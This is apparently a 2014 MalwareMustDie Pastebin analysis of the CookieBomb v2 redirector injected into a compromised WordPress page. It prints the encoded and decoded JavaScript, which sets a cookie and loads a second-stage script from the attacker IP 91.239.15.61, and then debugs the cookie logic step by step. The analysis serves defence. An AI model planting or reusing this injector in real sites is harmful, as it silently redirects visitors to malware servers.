SHARE
TWEET

CookieBomb v2 - First Cushion Cookie Flow Step by Step

MalwareMustDie Feb 20th, 2014 709 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. # MalwareMustDie! ( analyzed by: @unixfreaxjp)
  2. # A real case of new variation of the CookieBomb v2 first cushion spotted, to evade
  3. # the scanner by using the HTML special character unicode (&#nnnn) format.
  4. # The original code wasnt change and still being redirected to the currently
  5. # inactive CookieBomb server side on IP: 91.239.15.61
  6. # under interface of below URL:
  7. # h00p://91.239.15.61/google.js // first layer of second cushion script
  8. # h00p://91.239.15.61/g.php     // the infector w/reading referer for malicious trafic
  9. #
  10. # Point:
  11. # - The attempt to evade scanner for first cushion of CookieBomb v2 is exist.
  12. # - Decoding Guide and step by step of Cookie Debug of this first cushion method was explained,
  13. #
  14. # Reference:
  15. http://blog.malwaremustdie.org/2014/01/and-another-detonating-method-of-todays.html
  16. http://blog.malwaremustdie.org/2014/01/and-another-detonating-method-of-new.html
  17.  
  18. // Some infection side as a new obfuscation technique to make automation
  19. // can not deobfuscate the javascript code of CookieBomb v2 first cushion code.
  20.  
  21. // Download..
  22.  
  23. --2014-02-21 11:51:36--  http://{REDACTED}/blog/usces-cart/
  24. Resolving {REDACTED} ({REDACTED})... 182.48.26.52
  25. Connecting to {REDACTED}({REDACTED})|182.48.26.52|:80... connected.
  26. HTTP request sent, awaiting response... 200 OK
  27. Length: unspecified [text/html]
  28. Saving to: index.html
  29.  
  30. The network information of this infection:
  31.  
  32. $ ipchk geo 182.48.26.52
  33. -----------------------------------------------------------
  34. ipchk-shell 1.3 FreeBSD version - by @unixfreaxjp
  35. -----------------------------------------------------------
  36. Source : geo
  37. IP     : 182.48.26.52
  38. -----------------------------------------------------------
  39. 182.48.26.52|users156.heteml.jp.|9371 | 182.48.0.0/18 | SAKURA | JP | PAPERBOY.CO.JP | PAPERBOY&CO. INC.
  40.  
  41. // This victim is a wordpress site, right afer wp_social_bookmarking_light plugin I think,
  42. // this looks like a Wordpress compromising case to me.
  43. // pic: https://lh5.googleusercontent.com/-io1w9HIb65I/UwcFdacwaBI/AAAAAAAAOow/cb6Mxzv3vps/s912/A100100110.png
  44.  
  45. [...]
  46. <div class='wp_social_bookmarking_light'><div class="wsbl_facebook_like"><fb:like href="http://
  47. {REDACTED}/blog/usces-cart/" send="false" layout="button_count" width="100" show_faces="false" action
  48. ="like" colorscheme="light" font=""></fb:like></div><div class="wsbl_twitter">
  49. <iframe allowtransparency="true" frameborder="0" scrolling="no" src="http://platform.twitter.com/wid
  50. gets/tweet_button.html?url=http%3A%2F%2F{REDACTED}%2Fblog%2Fusces-cart%2F&amp;text=%E3%82%AB%E3%83%B
  51. C%E3%83%88&amp;lang=en&amp;count=horizontal" style="width:130px; height:20px;"></iframe></div></div>
  52. <br class='wp_social_bookmarking_light_clear' /><p>&lt;script language=&#8221;javascript&#8221;&gt;<br />
  53. document.write( unescape( &#8216;%3C%21%44%4F%43%54%59%50%45%20%48%54%4D%4C%20%50%55%42%4C%49%43%20%22
  54. %2D%2F%2F%57%33%43%2F%2F%44%54%44%20%48%54%4D%4C%20%34%2E%30%31%20%54%72%61%6E%73%69%74%69%6F%6E%61%6C
  55. %2F%2F%45%4E%22%20%22%68%74%74%70%3A%2F%2F%77%77%77%2E%77%33%2E%6F%72%67%2F%54%52%2F%68%74%6D%6C%34%2F
  56. %6C%6F%6F%73%65%2E%64%74%64%22%3E%0A%3C%68%74%6D%6C%3E%0A%3C%68%65%61%64%3E%0A%3C%6D%65%74%61%20%68%74
  57. %74%70%2D%65%71%75%69%76%3D%22%43%6F%6E%74%65%6E%74%2D%54%79%70%65%22%20%63%6F%6E%74%65%6E%74%3D%22%74
  58.  
  59.                                  {REDACTED FOR SAVING SPACE}
  60.  
  61. %7D%0A%0A%77%69%6E%64%6F%77%2E%6F%6E%6C%6F%61%64%20%3D%20%66%75%6E%63%74%69%6F%6E%28%29%0A%7B%0A%72%65
  62. %64%69%72%65%63%74%28%29%3B%0A%63%72%65%61%74%65%43%6F%6F%6B%69%65%28%27%64%6F%52%65%64%69%72%65%63%74
  63. %27%2C%27%74%72%75%65%27%2C%27%39%39%39%27%29%3B%0A%7D%0A%2F%2F%2D%2D%3E%0A%3C%2F%73%63%72%69%70%74%3E
  64. %0A%3C%2F%68%65%61%64%3E%0A%0A%3C%62%6F%64%79%3E%0A%3C%2F%62%6F%64%79%3E%0A%3C%2F%68%74%6D%6C%3E
  65. &#8217;));<br />
  66. &lt;/script&gt;</p>
  67. <div class='wp_social_bookmarking_light'><div class="wsbl_facebook_like">
  68. [...]
  69.  
  70. // removed the traps...it's: CookieBomb v2 malicious redirector first cushion
  71.  
  72. <script language=javascript><br />
  73. document.write( unescape('%3C%21%44%4F%43%54%59%50%45%20%48%54%4D%4C%20%50%55%42%4C%49%43%20%22%2D%2F%
  74. 2F%57%33%43%2F%2F%44%54%44%20%48%54%4D%4C%20%34%2E%30%31%20%54%72%61%6E%73%69%74%69%6F%6E%61%6C%2F%2F%
  75. 45%4E%22%20%22%68%74%74%70%3A%2F%2F%77%77%77%2E%77%33%2E%6F%72%67%2F%54%52%2F%68%74%6D%6C%34%2F%6C%6F%
  76. 6F%73%65%2E%64%74%64%22%3E%0A%3C%68%74%6D%6C%3E%0A%3C%68%65%61%64%3E%0A%3C%6D%65%74%61%20%68%74%74%70%
  77. 2D%65%71%75%69%76%3D%22%43%6F%6E%74%65%6E%74%2D%54%79%70%65%22%20%63%6F%6E%74%65%6E%74%3D%22%74%65%78%
  78. 74%2F%68%74%6D%6C%3B%20%63%68%61%72%73%65%74%3D%69%73%6F%2D%38%38%35%39%2D%31%22%3E%0A%3C%73%63%72%69%
  79. 70%74%20%74%79%70%65%3D%22%74%65%78%74%2F%6A%61%76%61%73%63%72%69%70%74%22%3E%0A%3C%21%2D%2D%0A%66%75%
  80. 6E%63%74%69%6F%6E%20%72%65%64%69%72%65%63%74%28%29%0A%7B%0A%76%61%72%20%74%68%65%63%6F%6F%6B%69%65%20%
  81. 3D%20%72%65%61%64%43%6F%6F%6B%69%65%28%27%64%6F%52%65%64%69%72%65%63%74%27%29%3B%0A%69%66%28%21%74%68%
  82. 65%63%6F%6F%6B%69%65%29%0A%7B%0A%20%20%20%20%20%76%61%72%20%68%65%61%64%3D%64%6F%63%75%6D%65%6E%74%2E%
  83. 67%65%74%45%6C%65%6D%65%6E%74%73%42%79%54%61%67%4E%61%6D%65%28%27%68%65%61%64%27%29%5B%30%5D%0A%20%20%
  84. 20%20%20%20%76%61%72%20%73%63%72%69%70%74%3D%64%6F%63%75%6D%65%6E%74%2E%63%72%65%61%74%65%45%6C%65%6D%
  85. 65%6E%74%28%27%73%63%72%69%70%74%27%29%0A%20%20%20%20%20%20%20%73%63%72%69%70%74%2E%73%65%74%41%74%74%
  86. 72%69%62%75%74%65%28%27%74%79%70%65%27%2C%20%27%74%65%78%74%2F%6A%61%76%61%73%63%72%69%70%74%27%29%0A%
  87. 20%20%20%20%20%20%20%73%63%72%69%70%74%2E%73%65%74%41%74%74%72%69%62%75%74%65%28%27%73%72%63%27%2C%20%
  88. 22%68%74%74%70%3A%2F%2F%39%31%2E%32%33%39%2E%31%35%2E%36%31%2F%67%6F%6F%67%6C%65%2E%6A%73%22%29%0A%20%
  89. 20%20%20%20%20%20%68%65%61%64%2E%61%70%70%65%6E%64%43%68%69%6C%64%28%73%63%72%69%70%74%29%0A%7D%0A%7D%
  90. 0A%0A%66%75%6E%63%74%69%6F%6E%20%63%72%65%61%74%65%43%6F%6F%6B%69%65%28%6E%61%6D%65%2C%76%61%6C%75%65%
  91. 2C%64%61%79%73%29%0A%7B%0A%69%66%20%28%64%61%79%73%29%0A%7B%0A%76%61%72%20%64%61%74%65%20%3D%20%6E%65%
  92. 77%20%44%61%74%65%28%29%3B%0A%64%61%74%65%2E%73%65%74%54%69%6D%65%28%64%61%74%65%2E%67%65%74%54%69%6D%
  93. 65%28%29%2B%28%64%61%79%73%2A%33%36%30%30%2A%33%36%30%30%2A%33%36%30%30%2A%31%30%30%30%29%29%3B%0A%76%
  94. 61%72%20%65%78%70%69%72%65%73%20%3D%20%22%3B%20%65%78%70%69%72%65%73%3D%22%2B%64%61%74%65%2E%74%6F%47%
  95. 4D%54%53%74%72%69%6E%67%28%29%3B%0A%7D%0A%65%6C%73%65%20%76%61%72%20%65%78%70%69%72%65%73%20%3D%20%22%
  96. 22%3B%0A%64%6F%63%75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%20%3D%20%6E%61%6D%65%2B%22%3D%22%2B%76%61%6C%75%
  97. 65%2B%65%78%70%69%72%65%73%2B%22%3B%20%70%61%74%68%3D%2F%22%3B%0A%7D%0A%0A%66%75%6E%63%74%69%6F%6E%20%
  98. 72%65%61%64%43%6F%6F%6B%69%65%28%6E%61%6D%65%29%0A%7B%0A%76%61%72%20%6E%61%6D%65%45%51%20%3D%20%6E%61%
  99. 6D%65%20%2B%20%22%3D%22%3B%0A%76%61%72%20%63%61%20%3D%20%64%6F%63%75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%
  100. 2E%73%70%6C%69%74%28%27%3B%27%29%3B%0A%66%6F%72%28%76%61%72%20%69%3D%30%3B%69%20%3C%20%63%61%2E%6C%65%
  101. 6E%67%74%68%3B%69%2B%2B%29%0A%7B%0A%76%61%72%20%63%20%3D%20%63%61%5B%69%5D%3B%0A%77%68%69%6C%65%20%28%
  102. 63%2E%63%68%61%72%41%74%28%30%29%3D%3D%27%20%27%29%20%63%20%3D%20%63%2E%73%75%62%73%74%72%69%6E%67%28%
  103. 31%2C%63%2E%6C%65%6E%67%74%68%29%3B%0A%69%66%20%28%63%2E%69%6E%64%65%78%4F%66%28%6E%61%6D%65%45%51%29%
  104. 20%3D%3D%20%30%29%20%72%65%74%75%72%6E%20%63%2E%73%75%62%73%74%72%69%6E%67%28%6E%61%6D%65%45%51%2E%6C%
  105. 65%6E%67%74%68%2C%63%2E%6C%65%6E%67%74%68%29%3B%0A%7D%0A%72%65%74%75%72%6E%20%6E%75%6C%6C%3B%0A%7D%0A%
  106. 0A%77%69%6E%64%6F%77%2E%6F%6E%6C%6F%61%64%20%3D%20%66%75%6E%63%74%69%6F%6E%28%29%0A%7B%0A%72%65%64%69%
  107. 72%65%63%74%28%29%3B%0A%63%72%65%61%74%65%43%6F%6F%6B%69%65%28%27%64%6F%52%65%64%69%72%65%63%74%27%2C%
  108. 27%74%72%75%65%27%2C%27%39%39%39%27%29%3B%0A%7D%0A%2F%2F%2D%2D%3E%0A%3C%2F%73%63%72%69%70%74%3E%0A%3C%
  109. 2F%68%65%61%64%3E%0A%0A%3C%62%6F%64%79%3E%0A%3C%2F%62%6F%64%79%3E%0A%3C%2F%68%74%6D%6C%3E'));<br />
  110. </script>
  111.  
  112. // decode and beautified i a bit, to get the full HTML
  113.  
  114. <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
  115. <html>
  116.  
  117. <head>
  118.     <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
  119.     <script type="text/javascript">
  120.         <!--
  121.         function redirect() {
  122.             var thecookie = readCookie('doRedirect');
  123.             if (!thecookie) {
  124.                 var head = document.getElementsByTagName('head')[0]
  125.                 var script = document.createElement('script')
  126.                 script.setAttribute('type', 'text/javascript')
  127.                 script.setAttribute('src', "http://91.239.15.61/google.js")
  128.                 head.appendChild(script)
  129.             }
  130.         }
  131.  
  132.         function createCookie(name, value, days) {
  133.             if (days) {
  134.                 var date = new Date();
  135.                 date.setTime(date.getTime() + (days * 3600 * 3600 * 3600 * 1000));
  136.                 var expires = "; expires=" + date.toGMTString();
  137.             } else var expires = "";
  138.             document.cookie = name + "=" + value + expires + "; path=/";
  139.         }
  140.  
  141.         function readCookie(name) {
  142.             var nameEQ = name + "=";
  143.             var ca = document.cookie.split(';');
  144.             for (var i = 0; i < ca.length; i++) {
  145.                 var c = ca[i];
  146.                 while (c.charAt(0) == ' ') c = c.substring(1, c.length);
  147.                 if (c.indexOf(nameEQ) == 0) return c.substring(nameEQ.length, c.length);
  148.             }
  149.             return null;
  150.         }
  151.  
  152.         window.onload = function () {
  153.             redirect();
  154.             createCookie('doRedirect', 'true', '999');
  155.         }
  156.          //-->
  157.     </script>
  158. </head>
  159.  
  160. <body>
  161. </body>
  162.  
  163. </html>
  164.  
  165.  
  166. // ======================================
  167. // Understanding how the cookie is formed..
  168. // Assemble the format of created cookie...
  169. // ======================================
  170.  
  171. // on loading the browser with JavaScript activated, will load:
  172. // createCookie() function to form the cookie strings below:
  173.  
  174. doRedirect=true; expires=$ExpDateLogic + "; path=/";
  175.  
  176.  
  177. // Checking $ExpDateLogic...
  178. // Firstly, $ExpDateLogic is my term, is a code that doing
  179. // The assembly of the expiry date of the cookie, below:
  180.  
  181.  if (days) {
  182.  var date = new Date();
  183.  date.setTime(date.getTime() + (days * 3600 * 3600 * 3600 * 1000));
  184.  var expires = "; expires=" + date.toGMTString(); }
  185.  
  186. // If we put no "days" then it will burp out the exact "now"
  187. // time/date in GMT, so it is incremental of current time,
  188. // the value is insignificant for me. PoC:
  189.  
  190.  days=0;
  191.  var expires = "";
  192.  var date = new Date();
  193.  /* var xxx = */
  194.  date.setTime(date.getTime() + (days * 3600 * 3600 * 3600 * 1000));
  195.  var expires = "; expires=" + date.toGMTString();
  196.  /* document.write(xxx);  */
  197.  document.write(expires);
  198.  
  199.  
  200. OUTPUT:
  201. ; expires=Fri, 21 Feb 2014 03:45:23 GMT
  202.  
  203. // the above formula won't work to process "999" as days.
  204. // even if we push the day = 1 the result will be something like:
  205. Sat, 13 Aug 3492 02:18:41 GMT
  206.             ^^^^
  207.  
  208.  
  209. // Assemble again...the created cookie strings...
  210.  
  211. "doRedirect=true; expires=Fri, 21 Feb 2014 03:45:23 GMT; path=/"
  212.  
  213. // Not we have the enough materials for the debugging further..
  214.  
  215.  
  216. // ======================================
  217. // Understanding how the cookie is checked
  218. // the flag of thecookie
  219. // ======================================
  220.  
  221.  
  222. // to do the redirect the cookie is checked,
  223. // checking was done with the below statement:
  224.  
  225. var thecookie = readCookie('doRedirect');
  226.  
  227. // this explains that readCookie() was used to check
  228. // the value resulted from "thecookie" is important flag.
  229.  
  230.  function readCookie(name) {
  231.  var nameEQ = name + "=";
  232.  var ca = document.cookie.split(';');
  233.  for (var i = 0; i < ca.length; i++) {
  234.      var c = ca[i];
  235.      while (c.charAt(0) == ' ') c = c.substring(1, c.length);
  236.      if (c.indexOf(nameEQ) == 0) return c.substring(nameEQ.length, c.length);
  237.    }  return null; }
  238.  
  239.  
  240. // I reformed a bit into the below code for debugging,
  241. // use your JS debugger to check the flow yourself
  242.  
  243.  var thecookie = readCookie('doRedirect');
  244.  function readCookie(name)
  245.  {
  246.    nameEQ = "doRedirect=";
  247.    var docookie = "doRedirect=true; expires=Fri, 21 Feb 2014 03:45:23 GMT; path=/";
  248.    var ca = docookie.split(';');
  249.    for (var i = 0; i < ca.length; i++)
  250.    {
  251.      var c = ca[i];
  252.      while (c.charAt(0) == ' ') c = c.substring(1, c.length);
  253.      if (c.indexOf(nameEQ) == 0) return c.substring(nameEQ.length, c.length);
  254.    }
  255.    return null;
  256.  }
  257.  document.write(thecookie);
  258.  
  259. OUTPUT:
  260. true
  261.  
  262. // if you run the above code , the value of thecookie = "true" if you have the right cookie,
  263. // so let's move along, what happen if you had the right cookie..
  264.  
  265. // NEXT!
  266. // Now we go to the "main course"..
  267.  
  268. if (!thecookie) {
  269.     var head = document.getElementsByTagName('head')[0]
  270.     var script = document.createElement('script')
  271.     script.setAttribute('type', 'text/javascript')
  272.     script.setAttribute('src', "h00p://91.239.15.61/google.js")
  273.     head.appendChild(script)
  274. }
  275.  
  276. // it was stated if (!thecookie) condition for the redirection.
  277. // Meaning, if you got the cookie that was created NOT just now,
  278. // then you have the ticket to access javascript in h00p://91.239.15.61/google.js
  279.  
  280. // The h00p://91.239.15.61/google.js is the second cushion which will
  281. // check again your validation of the cookie, referer and the next infected script
  282. // on h00p://91.239.15.61/google.js
  283. // Please refer to the http://blog.malwaremustdie.org/2014/01/and-another-detonating-method-of-new.html
  284.  
  285. ---
  286. #MalwareMustDie!!
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
 
Top